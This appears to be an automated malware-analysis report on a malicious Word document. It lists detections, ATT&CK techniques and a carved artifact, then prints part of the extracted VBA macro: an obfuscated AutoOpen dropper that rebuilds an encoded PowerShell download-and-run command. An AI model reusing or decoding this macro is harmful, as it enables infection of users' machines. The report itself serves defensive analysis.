Verdict: MALICIOUS
Risk Score: 242

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes the Shell() function, indicating an attempt to execute arbitrary commands, likely for downloading and executing a secondary payload. The ClamAV detection name 'Img.Dropper.PhishingLure-6443153-0' further supports its role as a dropper for malicious content.
Heuristics (7)

- ClamAV: Img.Dropper.PhishingLure-6443153-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 36720 bytes | d8f52fa3f5dd7a0b56377992d07196126159bda1c098a069b8bd12f3e8559752 |
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "DzSnffm"
Sub AutoOpen()
On Error Resume Next
pFWlburiQ = BMiojBuAlEZFzW + CDate(8789372) / 1729167 / 7664528 - 993128 - Fix(4600714)
JijBjDCqU = PUbXDzWiBGzI + CDate(8277807) / 5466908 / 870945 - 392930 - Fix(6999531)
FzrSGmKHT = KuldKaNWj + CDate(9520167) / 6616248 / 9262443 - 4899276 - Fix(4413852)
alwaAnGwh = wqcTJiRPj + CDate(5938926) / 2327409 / 7617949 - 3227627 - Fix(5617428)
Application.Run "SjdDRHjdpIHO", EjGjLXR
midGUEBJa = sUojGjLNMR + CDate(6314091) / 3859742 / 9525476 - 8736440 - Fix(2431784)
BfSMuKmVV = SJAcdRnQIbpth + CDate(1847036) / 593133 / 3727829 - 9680302 - Fix(5120296)
wwSlktTYj = fJFzTwoWKljAtD + CDate(7980795) / 3412845 / 4504734 - 1545339 - Fix(9668989)
IJbMMWYUj = GIEhqkwWqa + CDate(7189845) / 4106003 / 6224150 - 1615570 - Fix(2420336)
End Sub
Function EjGjLXR()
On Error Resume Next
AhrUvXIQmZ = ("n1DCiIrIn( '' ,( '44&156<163x141<144L141d163d144:40&75j40d46o50L47@156d47o53L47x145j47i53<47x167x55i157L142o152L145@143L47j53@47<164x47<51L40&162&141x156:144x157x155@7oTiCfzIoR")
mqmmkr = tzGltNGOaDOUu + CDate(7736362) / 2064291 / 9048692 - 6289046 - Fix(1284368)
cJTDFzzcK = czLDNUbiToMb + CDate(5249813) / 5656337 / 9461547 - 2505680 - Fix(7415911)
bImKV = Mid(AhrUvXIQmZ, 8, 160)
HGjdCKUv = ("fZYiR7l90ojEi0w3QPpSINmppUPXmu03Da93<40o151L156@40&44o101<104@103i130i51j173&164d162@cUsz")
zAMzHC = nitsRSima + CDate(2664625) / 5400836 / 7599697 - 8247435 - Fix(9486610)
lBiXsU = YPTqwBXwvWO + CDate(5742895) / 1393892 / 584121 - 2336900 - Fix(50005)
kwLQVw = Mid(HGjdCKUv, 36, 50)
zSVqv = ("BANcwiZbfzM8rLuv . ((GV '*MdR*').NAMe[3,11,2]-joIn'')( [STriNg]::jOm8j5")
BsdYvOZpBWS = CPAAsMsfmRQ + CDate(7297585) / 9739012 / 4214043 - 537392 - Fix(7818544)
tPjQNYudPu = jNNWujnwfc + CDate(4643159) / 8683590 / 7466572 - 2757210 - Fix(4073958)
vOIlsvDPT = Mid(zSVqv, 17, 51)
mXjGiZFXbFF = ("1jK0q[coNvErt]::toINt16( ($_.tOstrinG() ) ,8)))} ))) Z7iYqjzsFA5JRAL")
jtWmO = nJIiMEMjTmzCv + CDate(8347457) / 6901326 / 382796 - 689387 - Fix(2128679)
fVKtnRNGj = YOFznnvDl + CDate(2346477) / 6000854 / 6982465 - 153844 - Fix(2028228)
IBmqwEDqm = Mid(mXjGiZFXbFF, 6, 48)
HEiLbAdW = ("YRC2j144:141o163i144@56x156:145x170d164<50o61@60&60i60i60@54o40<62:70@62:61j63<63&51<73j44x101:104o103jYvUKvzC33AiYCU0QN")
KtQoSiC = ViZiMUvRBbXoCw + CDate(8491006) / 2746048 / 7084548 - 5939602 - Fix(8188653)
SzWwNoWAt = tNazRKjwzBbz + CDate(8047929) / 7410013 / 5999742 - 6099448 - Fix(1365653)
XMzBFvlOz = Mid(HEiLbAdW, 5, 98)
JzNmBbDT = ("wIhqziUS0fZznlt1ahLZi51o154:56&143d157j155d57L153x105j130o107x61&170o126&57&47@56j123o160d154&151@164:50&47j77&47x51j73j44j123<104o103<40d75i40d4434SRQVJlq01oqf")
TjEYsh = DHEcRCo + CDate(9798984) / 3803111 / 9897924 - 59506 - Fix(4947410)
zIEhtI = PTMHMmARtMEESZ + CDate(4457000) / 9613731 / 2751936 - 7078399 - Fix(9184818)
ivBtihLmr = Mid(JzNmBbDT, 22, 125)
akfSfn = ("j57o162:141:171L164:150&151x147o160L145:156o56:14OzAGL2KQrVZq13wAFFBXpA7pDDvI")
qjmboS = mcEsYkKvAXzdR + CDate(185259) / 1051182 / 2819532 - 874688 - Fix(85251)
qVpmJmB = hvkcFwwv + CDate(2652668) / 2017593 / 6451894 - 7087725 - Fix(3388135)
DTGOuzlTrlH = Mid(akfSfn, 2, 48)
bbjMrY = ("dQuXqjVXt5w25wzTiTzM2SBbA2171<173L44d131&131:125L56@42j104&157L140@127@156x154i140o117:141j144<106:111&140x154o145x42o50<44L141x163i146j143o56d42L124o1WpR8FQ28")
YjvUI = kVanRTon + CDate(8787478) / 249878 / 9935585 - 9645305 - Fix(9184744)
ddrwwBpQjji = pwkSnhYkpT + CDate(6511729) / 292123 / 9853092 - 1658614 - Fix(1657172)
uwBTEs = Mid(bbjMrY, 27, 125)
EUJRzvKVhV = ("d9cwufUYQ6Zl25bdwGIJiFFw175<143j141o164o143&150&173i175j175'.SPlIt( 'ij:<@&Lxdo')| % {([CHar] ( 8ML")
KWESb = HbNcrJTanzjH + CDate(1049530) / 3152947 / 3820270 - 6209145 - Fix(5960901)
vEzUOKm = siALLOJNCVE + CDate(1464868) / 9247561 / 5847445 - 6271448 - Fix(9849
```

... (truncated)